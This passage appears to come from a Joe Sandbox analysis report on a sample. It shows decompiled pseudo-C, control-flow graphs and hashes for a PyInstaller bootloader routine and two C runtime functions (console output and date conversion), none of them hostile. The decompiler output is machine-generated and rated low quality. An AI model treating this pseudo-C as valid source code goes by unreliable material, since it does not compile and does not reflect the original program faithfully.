7ff735c41b60 1136->1149 1150 7ff735c4389f-7ff735c438a2 call 7ff735c466e0 1136->1150 1153 7ff735c438af-7ff735c438b1 1149->1153 1150->1149 1153->1055
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C439F0: GetModuleFileNameW.KERNEL32(?,00007FF735C435DC), ref: 00007FF735C43A21
                                                                                                                                                                                                                              • SetDllDirectoryW.KERNEL32 ref: 00007FF735C436FD
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C46440: GetEnvironmentVariableW.KERNEL32(00007FF735C4361E), ref: 00007FF735C4647A
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C46440: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF735C46497
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C469E0: SetEnvironmentVariableW.KERNEL32 ref: 00007FF735C469FF
                                                                                                                                                                                                                                • Part of subcall function 00007FF735C42820: MessageBoxW.USER32 ref: 00007FF735C428F1
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Environment$Variable$DirectoryExpandFileMessageModuleNameStrings
                                                                                                                                                                                                                              • String ID: Cannot open self %s or archive %s$Failed to convert DLL search path!$_MEIPASS2
                                                                                                                                                                                                                              • API String ID: 2418257720-3660216322
                                                                                                                                                                                                                              • Opcode ID: a943f5caa7d25caa532609a4448aad586969c68ceca373da38b5f7e86a129c43
                                                                                                                                                                                                                              • Instruction ID: 3f92f3c5dd2c2eff1c38dee4372ae990cd72e5485964d101f723c87d95860861
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a943f5caa7d25caa532609a4448aad586969c68ceca373da38b5f7e86a129c43
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24918693A185A371FA22BB21D5519FDD262BF84FCCFC40032EA4D4768ADF2CE545E660
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5BAAC Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1154 7ff735c5baac-7ff735c5bad1 1155 7ff735c5bad7-7ff735c5bada 1154->1155 1156 7ff735c5bda9 1154->1156 1157 7ff735c5badc-7ff735c5bb0e call 7ff735c59330 1155->1157 1158 7ff735c5bb13-7ff735c5bb3e 1155->1158 1159 7ff735c5bdab-7ff735c5bdbb 1156->1159 1157->1159 1161 7ff735c5bb49-7ff735c5bb4f 1158->1161 1162 7ff735c5bb40-7ff735c5bb47 1158->1162 1164 7ff735c5bb5f-7ff735c5bb78 call 7ff735c61cd4 1161->1164 1165 7ff735c5bb51-7ff735c5bb5a call 7ff735c5ae54 1161->1165 1162->1157 1162->1161 1169 7ff735c5bb7e-7ff735c5bb87 1164->1169 1170 7ff735c5bc95-7ff735c5bc9e 1164->1170 1165->1164 1169->1170 1171 7ff735c5bb8d-7ff735c5bb91 1169->1171 1172 7ff735c5bca0-7ff735c5bca5 1170->1172 1173 7ff735c5bcf1-7ff735c5bd16 WriteFile 1170->1173 1174 7ff735c5bb93-7ff735c5bb9f call 7ff735c53100 1171->1174 1175 7ff735c5bba6-7ff735c5bbb1 1171->1175 1178 7ff735c5bcdd-7ff735c5bcef call 7ff735c5b55c 1172->1178 1179 7ff735c5bca7-7ff735c5bcaa 1172->1179 1176 7ff735c5bd18-7ff735c5bd1e GetLastError 1173->1176 1177 7ff735c5bd21 1173->1177 1174->1175 1181 7ff735c5bbb3-7ff735c5bbbc 1175->1181 1182 7ff735c5bbc2-7ff735c5bbd7 GetConsoleMode 1175->1182 1176->1177 1184 7ff735c5bd24 1177->1184 1199 7ff735c5bc7e-7ff735c5bc85 1178->1199 1185 7ff735c5bcac-7ff735c5bcaf 1179->1185 1186 7ff735c5bcc9-7ff735c5bcdb call 7ff735c5b77c 1179->1186 1181->1170 1181->1182 1192 7ff735c5bbdd-7ff735c5bbe0 1182->1192 1193 7ff735c5bc8a-7ff735c5bc8e 1182->1193 1194 7ff735c5bd29 1184->1194 1187 7ff735c5bd39-7ff735c5bd43 1185->1187 1188 7ff735c5bcb5-7ff735c5bcc7 call 7ff735c5b660 1185->1188 1186->1199 1195 7ff735c5bd45-7ff735c5bd4a 1187->1195 1196 7ff735c5bda2-7ff735c5bda7 1187->1196 1188->1199 1200 7ff735c5bc67-7ff735c5bc79 call 7ff735c5b0d0 1192->1200 1201 7ff735c5bbe6-7ff735c5bbed 1192->1201 1193->1170 1202 7ff735c5bd2e-7ff735c5bd32 1194->1202 1203 7ff735c5bd4c-7ff735c5bd4f 1195->1203 1204 7ff735c5bd78-7ff735c5bd82 1195->1204 1196->1159 1199->1194 1200->1199 1201->1202 1207 7ff735c5bbf3-7ff735c5bc01 1201->1207 1202->1187 1208 7ff735c5bd68-7ff735c5bd73 call 7ff735c53ad4 1203->1208 1209 7ff735c5bd51-7ff735c5bd60 1203->1209 1210 7ff735c5bd8a-7ff735c5bd99 1204->1210 1211 7ff735c5bd84-7ff735c5bd88 1204->1211 1207->1184 1212 7ff735c5bc07 1207->1212 1208->1204 1209->1208 1210->1196 1211->1156 1211->1210 1214 7ff735c5bc0a-7ff735c5bc21 call 7ff735c61da0 1212->1214 1218 7ff735c5bc59-7ff735c5bc62 GetLastError 1214->1218 1219 7ff735c5bc23-7ff735c5bc2d 1214->1219 1218->1184 1220 7ff735c5bc4a-7ff735c5bc51 1219->1220 1221 7ff735c5bc2f-7ff735c5bc41 call 7ff735c61da0 1219->1221 1220->1184 1223 7ff735c5bc57 1220->1223 1221->1218 1225 7ff735c5bc43-7ff735c5bc48 1221->1225 1223->1214 1225->1220
                                                                                                                                                                                                                              C-Code - Quality: 34%
                                                                                                                                                                                                                              			E00007FF77FF735C5BAAC(void* __ebx, signed int __ecx, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10, void* __r11) {
				signed short _v80;
				void* _v92;
				signed int _v96;
				intOrPtr _v104;
				intOrPtr _v108;
				long _v112;
				signed int _v120;
				long long _v128;
				signed int _v136;
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t107;
				int _t115;
				long _t116;
				signed int _t117;
				void* _t122;
				signed int _t128;
				intOrPtr _t146;
				intOrPtr _t147;
				void* _t167;
				signed long long _t180;
				signed long long _t184;
				signed long long _t187;
				signed long long _t206;
				signed int _t207;
				void* _t208;
				void* _t210;
				void* _t224;
				void* _t225;
				void* _t227;
				signed long long _t228;
				signed short* _t229;
				void* _t230;
				signed short* _t231;

				_t225 = __r11;
				_t224 = __r10;
				_t122 = __ebx;
				r15d = r8d;
				_t184 = __r9;
				_t229 = __rdx;
				if (r8d == 0) goto 0x35c5bda9;
				if (__rdx != 0) goto 0x35c5bb13;
				 *((char*)(__r9 + 0x38)) = 1;
				r8d = 0;
				 *((intOrPtr*)(__r9 + 0x34)) = 0;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
				r9d = 0;
				_v128 = __r9;
				_v136 = _t207;
				E00007FF77FF735C59330(__rax, __r9, __rcx, __rdx, _t208, _t210, __r8);
				goto 0x35c5bdab;
				_t187 = __ecx >> 6;
				_v120 = _t187;
				_t228 = __ecx + __ecx * 8;
				if (_t208 - 1 - 1 > 0) goto 0x35c5bb49;
				if (( !r15d & 0x00000001) == 0) goto 0x35c5badc;
				if (( *( *((intOrPtr*)(0x35c8aa40 + _t187 * 8)) + 0x38 + _t228 * 8) & 0x00000020) == 0) goto 0x35c5bb5f;
				r8d = 0x7ff735c8aa42;
				0x35c5ae54();
				_v96 = _t207;
				if (E00007FF77FF735C61CD4(r12d, __ecx) == 0) goto 0x35c5bc95;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x35c8aa40 + _v120 * 8)) + 0x38 + _t228 * 8)) - dil >= 0) goto 0x35c5bc95;
				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x35c5bba6;
				E00007FF77FF735C53100( *((intOrPtr*)(0x35c8aa40 + _v120 * 8)), __r9, __r9, _t208);
				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t207) goto 0x35c5bbc2;
				_t180 =  *((intOrPtr*)(0x35c8aa40 + _v120 * 8));
				if ( *((intOrPtr*)(_t180 + 0x39 + _t228 * 8)) == dil) goto 0x35c5bc95;
				if (GetConsoleMode(??, ??) == 0) goto 0x35c5bc8a;
				if (sil == 0) goto 0x35c5bc67;
				sil = sil - 1;
				if (sil - 1 > 0) goto 0x35c5bd2e;
				_t227 = _t229 + _t230;
				_v112 = _t207;
				_t231 = _t229;
				if (_t229 - _t227 >= 0) goto 0x35c5bd24;
				_v80 =  *_t231 & 0x0000ffff;
				_t107 = E00007FF77FF735C61DA0( *_t231 & 0xffff);
				_t128 = _v80 & 0x0000ffff;
				if (_t107 != _t128) goto 0x35c5bc59;
				_t146 = _v108 + 2;
				_v108 = _t146;
				if (_t128 != 0xa) goto 0x35c5bc4a;
				if (E00007FF77FF735C61DA0(0xd) != 0xd) goto 0x35c5bc59;
				_t147 = _t146 + 1;
				_v108 = _t147;
				if ( &(_t231[1]) - _t227 >= 0) goto 0x35c5bd24;
				goto 0x35c5bc0a;
				_v112 = GetLastError();
				goto 0x35c5bd24;
				r9d = r15d;
				_v136 = __r9;
				E00007FF77FF735C5B0D0(0xd, r12d, _t147, __r9,  &_v112, _t229);
				asm("movsd xmm0, [eax]");
				goto 0x35c5bd29;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x35c8aa40 + _v120 * 8)) + 0x38 + _t228 * 8)) - dil >= 0) goto 0x35c5bcf1;
				_t167 = sil;
				if (_t167 == 0) goto 0x35c5bcdd;
				if (_t167 == 0) goto 0x35c5bcc9;
				if (_t147 - 1 != 1) goto 0x35c5bd39;
				r9d = r15d;
				E00007FF77FF735C5B660(_t122, r12d, _t180, _t184,  &_v112, _t210, _t229, _t224, _t225);
				goto 0x35c5bc7e;
				r9d = r15d;
				E00007FF77FF735C5B77C(r12d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v112, _t210, _t229, _t224, _t225);
				goto 0x35c5bc7e;
				r9d = r15d;
				E00007FF77FF735C5B55C(_t122, _t147 - 1, r12d, _t180, _t184,  &_v112, _t210, _t229, _t224, _t225);
				goto 0x35c5bc7e;
				r8d = r15d;
				_v136 = _v136 & _t180;
				_v112 = _t180;
				_v104 = 0;
				_t115 = WriteFile(??, ??, ??, ??, ??); // executed
				if (_t115 != 0) goto 0x35c5bd21;
				_t116 = GetLastError();
				_v112 = _t116;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				if (_t116 != 0) goto 0x35c5bda2;
				_t117 = _v96;
				if (_t117 == 0) goto 0x35c5bd78;
				if (_t117 != 5) goto 0x35c5bd68;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
				 *((char*)(_t184 + 0x38)) = 1;
				 *(_t184 + 0x34) = _t117;
				goto 0x35c5bb0b;
				_t206 = _t184;
				E00007FF77FF735C53AD4(_v96, _t206);
				goto 0x35c5bb0b;
				if (( *( *((intOrPtr*)(0x35c8aa40 + _t206 * 8)) + 0x38 + _t228 * 8) & 0x00000040) == 0) goto 0x35c5bd8a;
				if ( *_t229 == 0x1a) goto 0x35c5bda9;
				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
				 *((char*)(_t184 + 0x38)) = 1;
				goto 0x35c5bb0b;
				goto 0x35c5bdab;
				return 0;
			}






































                                                                                                                                                                                                                              0x7ff735c5baac
                                                                                                                                                                                                                              0x7ff735c5baac
                                                                                                                                                                                                                              0x7ff735c5baac
                                                                                                                                                                                                                              0x7ff735c5bac2
                                                                                                                                                                                                                              0x7ff735c5bac8
                                                                                                                                                                                                                              0x7ff735c5bacb
                                                                                                                                                                                                                              0x7ff735c5bad1
                                                                                                                                                                                                                              0x7ff735c5bada
                                                                                                                                                                                                                              0x7ff735c5badc
                                                                                                                                                                                                                              0x7ff735c5bae1
                                                                                                                                                                                                                              0x7ff735c5bae4
                                                                                                                                                                                                                              0x7ff735c5baea
                                                                                                                                                                                                                              0x7ff735c5baf1
                                                                                                                                                                                                                              0x7ff735c5baf9
                                                                                                                                                                                                                              0x7ff735c5bafc
                                                                                                                                                                                                                              0x7ff735c5bb01
                                                                                                                                                                                                                              0x7ff735c5bb06
                                                                                                                                                                                                                              0x7ff735c5bb0e
                                                                                                                                                                                                                              0x7ff735c5bb23
                                                                                                                                                                                                                              0x7ff735c5bb27
                                                                                                                                                                                                                              0x7ff735c5bb2b
                                                                                                                                                                                                                              0x7ff735c5bb3e
                                                                                                                                                                                                                              0x7ff735c5bb47
                                                                                                                                                                                                                              0x7ff735c5bb4f
                                                                                                                                                                                                                              0x7ff735c5bb56
                                                                                                                                                                                                                              0x7ff735c5bb5a
                                                                                                                                                                                                                              0x7ff735c5bb62
                                                                                                                                                                                                                              0x7ff735c5bb78
                                                                                                                                                                                                                              0x7ff735c5bb87
                                                                                                                                                                                                                              0x7ff735c5bb91
                                                                                                                                                                                                                              0x7ff735c5bb96
                                                                                                                                                                                                                              0x7ff735c5bbb1
                                                                                                                                                                                                                              0x7ff735c5bbb3
                                                                                                                                                                                                                              0x7ff735c5bbbc
                                                                                                                                                                                                                              0x7ff735c5bbd7
                                                                                                                                                                                                                              0x7ff735c5bbe0
                                                                                                                                                                                                                              0x7ff735c5bbe6
                                                                                                                                                                                                                              0x7ff735c5bbed
                                                                                                                                                                                                                              0x7ff735c5bbf3
                                                                                                                                                                                                                              0x7ff735c5bbf7
                                                                                                                                                                                                                              0x7ff735c5bbfb
                                                                                                                                                                                                                              0x7ff735c5bc01
                                                                                                                                                                                                                              0x7ff735c5bc11
                                                                                                                                                                                                                              0x7ff735c5bc15
                                                                                                                                                                                                                              0x7ff735c5bc1a
                                                                                                                                                                                                                              0x7ff735c5bc21
                                                                                                                                                                                                                              0x7ff735c5bc23
                                                                                                                                                                                                                              0x7ff735c5bc26
                                                                                                                                                                                                                              0x7ff735c5bc2d
                                                                                                                                                                                                                              0x7ff735c5bc41
                                                                                                                                                                                                                              0x7ff735c5bc43
                                                                                                                                                                                                                              0x7ff735c5bc45
                                                                                                                                                                                                                              0x7ff735c5bc51
                                                                                                                                                                                                                              0x7ff735c5bc57
                                                                                                                                                                                                                              0x7ff735c5bc5f
                                                                                                                                                                                                                              0x7ff735c5bc62
                                                                                                                                                                                                                              0x7ff735c5bc67
                                                                                                                                                                                                                              0x7ff735c5bc6a
                                                                                                                                                                                                                              0x7ff735c5bc79
                                                                                                                                                                                                                              0x7ff735c5bc7e
                                                                                                                                                                                                                              0x7ff735c5bc85
                                                                                                                                                                                                                              0x7ff735c5bc9e
                                                                                                                                                                                                                              0x7ff735c5bca2
                                                                                                                                                                                                                              0x7ff735c5bca5
                                                                                                                                                                                                                              0x7ff735c5bcaa
                                                                                                                                                                                                                              0x7ff735c5bcaf
                                                                                                                                                                                                                              0x7ff735c5bcb5
                                                                                                                                                                                                                              0x7ff735c5bcc2
                                                                                                                                                                                                                              0x7ff735c5bcc7
                                                                                                                                                                                                                              0x7ff735c5bcc9
                                                                                                                                                                                                                              0x7ff735c5bcd6
                                                                                                                                                                                                                              0x7ff735c5bcdb
                                                                                                                                                                                                                              0x7ff735c5bcdd
                                                                                                                                                                                                                              0x7ff735c5bcea
                                                                                                                                                                                                                              0x7ff735c5bcef
                                                                                                                                                                                                                              0x7ff735c5bcfc
                                                                                                                                                                                                                              0x7ff735c5bcff
                                                                                                                                                                                                                              0x7ff735c5bd07
                                                                                                                                                                                                                              0x7ff735c5bd0b
                                                                                                                                                                                                                              0x7ff735c5bd0e
                                                                                                                                                                                                                              0x7ff735c5bd16
                                                                                                                                                                                                                              0x7ff735c5bd18
                                                                                                                                                                                                                              0x7ff735c5bd1e
                                                                                                                                                                                                                              0x7ff735c5bd24
                                                                                                                                                                                                                              0x7ff735c5bd29
                                                                                                                                                                                                                              0x7ff735c5bd43
                                                                                                                                                                                                                              0x7ff735c5bd45
                                                                                                                                                                                                                              0x7ff735c5bd4a
                                                                                                                                                                                                                              0x7ff735c5bd4f
                                                                                                                                                                                                                              0x7ff735c5bd51
                                                                                                                                                                                                                              0x7ff735c5bd55
                                                                                                                                                                                                                              0x7ff735c5bd5c
                                                                                                                                                                                                                              0x7ff735c5bd60
                                                                                                                                                                                                                              0x7ff735c5bd63
                                                                                                                                                                                                                              0x7ff735c5bd6b
                                                                                                                                                                                                                              0x7ff735c5bd6e
                                                                                                                                                                                                                              0x7ff735c5bd73
                                                                                                                                                                                                                              0x7ff735c5bd82
                                                                                                                                                                                                                              0x7ff735c5bd88
                                                                                                                                                                                                                              0x7ff735c5bd8a
                                                                                                                                                                                                                              0x7ff735c5bd8e
                                                                                                                                                                                                                              0x7ff735c5bd92
                                                                                                                                                                                                                              0x7ff735c5bd99
                                                                                                                                                                                                                              0x7ff735c5bd9d
                                                                                                                                                                                                                              0x7ff735c5bda7
                                                                                                                                                                                                                              0x7ff735c5bdbb

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF735C5BA4C), ref: 00007FF735C5BBCF
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF735C5BA4C), ref: 00007FF735C5BC59
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 953036326-0
                                                                                                                                                                                                                              • Opcode ID: a25d235c2584ad097b8a4f49689229189b0b82230173c99f6555414677b6b51c
                                                                                                                                                                                                                              • Instruction ID: dca6412de37a24d2d3f2489f1aef2392e665697c1be69b81323a9e4fd5c6b357
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a25d235c2584ad097b8a4f49689229189b0b82230173c99f6555414677b6b51c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8491B4B3A18653A5F750ABA694802BDABA0EB44F8CF844535DE0F17699CF7CE441E720
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C5DF20 Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 97%
                                                                                                                                                                                                                              			E00007FF77FF735C5DF20(signed int __edx, void* __edi, void* __rcx, void* __rdx, intOrPtr _a40, intOrPtr _a48, intOrPtr _a56) {
				signed int _v80;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v104;
				signed long long _v112;
				intOrPtr _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				unsigned int _v136;
				void* _t54;
				void* _t65;
				intOrPtr _t67;
				signed long long _t86;
				intOrPtr _t88;
				signed long long _t110;
				signed long long _t111;
				intOrPtr* _t118;
				void* _t120;
				signed long long _t138;
				void* _t143;

				_t110 =  *0x35c7b008; // 0x861d85c91f07
				_t111 = _t110 ^ _t143 - 0x00000078;
				_v80 = _t111;
				_t67 = __rcx - 0x76c;
				_t86 = r8d;
				_v136 = r9d;
				_t138 = __edx;
				if (_t67 - 0x46 < 0) goto 0x35c5e108;
				if (_t67 - 0x44d > 0) goto 0x35c5e108;
				r15d = __edx - 1;
				if (r15d - 0xb > 0) goto 0x35c5e108;
				if (r8d <= 0) goto 0x35c5e108;
				if (r8d -  *((intOrPtr*)(0x35c75c20 + __edx * 4)) -  *((intOrPtr*)(0x35c75c20 + __edx * 4 - 4)) <= 0) goto 0x35c5dfc1;
				if (E00007FF77FF735C5DEC0(_t67, r8d -  *((intOrPtr*)(0x35c75c20 + __edx * 4)) -  *((intOrPtr*)(0x35c75c20 + __edx * 4 - 4))) == 0) goto 0x35c5e108;
				if (__edi != 2) goto 0x35c5e108;
				if (_t86 - 0x1d > 0) goto 0x35c5e108;
				if (_v136 - 0x17 > 0) goto 0x35c5e108;
				if (r13d - 0x3b > 0) goto 0x35c5e108;
				if (r12d - 0x3b > 0) goto 0x35c5e108;
				_t54 = E00007FF77FF735C5DEC0(_t67, r12d - 0x3b);
				r14d = 0;
				if (_t54 == 0) goto 0x35c5dff8;
				if (__edi - 2 <= 0) goto 0x35c5dff8;
				_t88 = _t86 +  *((intOrPtr*)(0x35c75c20 + _t138 * 4 - 4)) + 1; // executed
				E00007FF77FF735C64578(_t111); // executed
				_v124 = r14d;
				_v128 = r14d;
				_v132 = r14d;
				if (E00007FF77FF735C63984(_t111,  &_v124) != 0) goto 0x35c5e134;
				if (E00007FF77FF735C639B4(_t111,  &_v128) != 0) goto 0x35c5e134;
				if (E00007FF77FF735C639E4(_t111,  &_v132) != 0) goto 0x35c5e134;
				r8d = _t120 - 1;
				r10d = 0x51eb851f;
				r9d = r10d * (_t120 + 0x12b) >> 0x20;
				r9d = r9d >> 7;
				r9d = r9d + (r9d >> 0x1f);
				r9d = r9d - (r10d * r8d >> 0x20 >> 5) + (r10d * r8d >> 0x20 >> 5 >> 0x1f);
				asm("cdq");
				if (_a56 == 1) goto 0x35c5e103;
				_v92 = _t88;
				_v100 = _t67;
				_v104 = r15d;
				_v112 = r8d;
				_v116 = r13d;
				_v120 = r12d;
				if (_a56 != 0xffffffff) goto 0x35c5e0fe;
				if (_v124 == 0) goto 0x35c5e0fe;
				if (E00007FF77FF735C645B8( &_v120) != 0) goto 0x35c5e103;
				goto 0x35c5e117;
				_t118 = _v128 + ((_v136 + ((__rdx + _t111 >> 2) + 0xffffffef + r9d + (_t67 - 0x46) * 0x16d + _t88 + ((__rdx + _t111 >> 2) + 0xffffffef + r9d + (_t67 - 0x46) * 0x16d + _t88) * 2) * 8) * 0x3c + _a40) * 0x3c + _v132 + _a48;
				goto 0x35c5e117;
				_t65 = E00007FF77FF735C53B18(_t118);
				 *_t118 = 0x16;
				return E00007FF77FF735C4A410(_t65, (__rdx + _t111 >> 2) + 0xffffffef + r9d, _v80 ^ _t143 - 0x00000078);
			}

























                                                                                                                                                                                                                              0x7ff735c5df34
                                                                                                                                                                                                                              0x7ff735c5df3b
                                                                                                                                                                                                                              0x7ff735c5df3e
                                                                                                                                                                                                                              0x7ff735c5df46
                                                                                                                                                                                                                              0x7ff735c5df50
                                                                                                                                                                                                                              0x7ff735c5df53
                                                                                                                                                                                                                              0x7ff735c5df57
                                                                                                                                                                                                                              0x7ff735c5df5d
                                                                                                                                                                                                                              0x7ff735c5df69
                                                                                                                                                                                                                              0x7ff735c5df6f
                                                                                                                                                                                                                              0x7ff735c5df77
                                                                                                                                                                                                                              0x7ff735c5df80
                                                                                                                                                                                                                              0x7ff735c5df97
                                                                                                                                                                                                                              0x7ff735c5dfa2
                                                                                                                                                                                                                              0x7ff735c5dfab
                                                                                                                                                                                                                              0x7ff735c5dfb4
                                                                                                                                                                                                                              0x7ff735c5dfc5
                                                                                                                                                                                                                              0x7ff735c5dfcf
                                                                                                                                                                                                                              0x7ff735c5dfd9
                                                                                                                                                                                                                              0x7ff735c5dfe5
                                                                                                                                                                                                                              0x7ff735c5dfea
                                                                                                                                                                                                                              0x7ff735c5dfef
                                                                                                                                                                                                                              0x7ff735c5dff4
                                                                                                                                                                                                                              0x7ff735c5dff6
                                                                                                                                                                                                                              0x7ff735c5dff8
                                                                                                                                                                                                                              0x7ff735c5e001
                                                                                                                                                                                                                              0x7ff735c5e005
                                                                                                                                                                                                                              0x7ff735c5e009
                                                                                                                                                                                                                              0x7ff735c5e014
                                                                                                                                                                                                                              0x7ff735c5e025
                                                                                                                                                                                                                              0x7ff735c5e036
                                                                                                                                                                                                                              0x7ff735c5e046
                                                                                                                                                                                                                              0x7ff735c5e04a
                                                                                                                                                                                                                              0x7ff735c5e058
                                                                                                                                                                                                                              0x7ff735c5e05e
                                                                                                                                                                                                                              0x7ff735c5e072
                                                                                                                                                                                                                              0x7ff735c5e07c
                                                                                                                                                                                                                              0x7ff735c5e07f
                                                                                                                                                                                                                              0x7ff735c5e0cd
                                                                                                                                                                                                                              0x7ff735c5e0d3
                                                                                                                                                                                                                              0x7ff735c5e0d6
                                                                                                                                                                                                                              0x7ff735c5e0d9
                                                                                                                                                                                                                              0x7ff735c5e0dd
                                                                                                                                                                                                                              0x7ff735c5e0e1
                                                                                                                                                                                                                              0x7ff735c5e0e5
                                                                                                                                                                                                                              0x7ff735c5e0e9
                                                                                                                                                                                                                              0x7ff735c5e0ef
                                                                                                                                                                                                                              0x7ff735c5e0fc
                                                                                                                                                                                                                              0x7ff735c5e101
                                                                                                                                                                                                                              0x7ff735c5e103
                                                                                                                                                                                                                              0x7ff735c5e106
                                                                                                                                                                                                                              0x7ff735c5e108
                                                                                                                                                                                                                              0x7ff735c5e10d
                                                                                                                                                                                                                              0x7ff735c5e133

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4170891091-0
                                                                                                                                                                                                                              • Opcode ID: af2cb500e1c42bd6e01b430ca0ed46a61e0c275666a9463c1b7753df8e5e119f
                                                                                                                                                                                                                              • Instruction ID: ef1d372cef1b1cb926737a5661003b3aca79c022875b10ffe5a49ec98a501f60
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af2cb500e1c42bd6e01b430ca0ed46a61e0c275666a9463c1b7753df8e5e119f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 385127B3F082136AFB14EBA599451BDA761AB40B9CF900535DE0E57AD6CF38A502E710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

